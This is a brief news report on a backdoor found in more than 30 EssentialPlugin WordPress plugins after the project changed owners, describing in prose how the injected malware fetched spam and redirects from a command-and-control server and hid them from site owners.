More than 30 WordPress plugins in the EssentialPlugin package have been compromised with malicious code that allows unauthorized access to websites running them. A malicious actor planted the backdoor code last year but only recently started pushing it to users via updates, generating spam pages and causing redirects, as per the instructions received from the command-and-control (C2) server. The compromise affects plugins with hundreds of thousands of active installations and was spotted by Austin Ginder, the founder of managed WordPress hosting provider Anchor Hosting, after receiving a tip about one add-on containing code that allowed third-party access. Further investigation by Ginder revealed that a backdoor had been present in all plugins within the EssentialPlugin package since August 2025, after the project was acquired in a six-figure deal by a new owner. EssentialPlugin, established in 2015 as WP Online Support and rebranded in 2021, is a WordPress development firm offering sliders, galleries, marketing tools, WooCommerce extensions, SEO/analytics utilities, and themes. According to Ginder, the backdoor sat inactive until it was recently activated and silently contacted external infrastructure to fetch a file (‘wp-comments-posts.php’) that injects malware into ‘wp-config.php.’ The downloaded malware is invisible to site owners and uses Ethereum-based C2 address resolution for evasion. Depending on the received instructions, the malware can retrieve "spam links, redirects, and fake pages". “The injected code was sophisticated. It fetched spam links, redirects, and fake pages from a command-and-control server. It only showed the spam to Googlebot, making it invisible to site owners,” explained Ginder.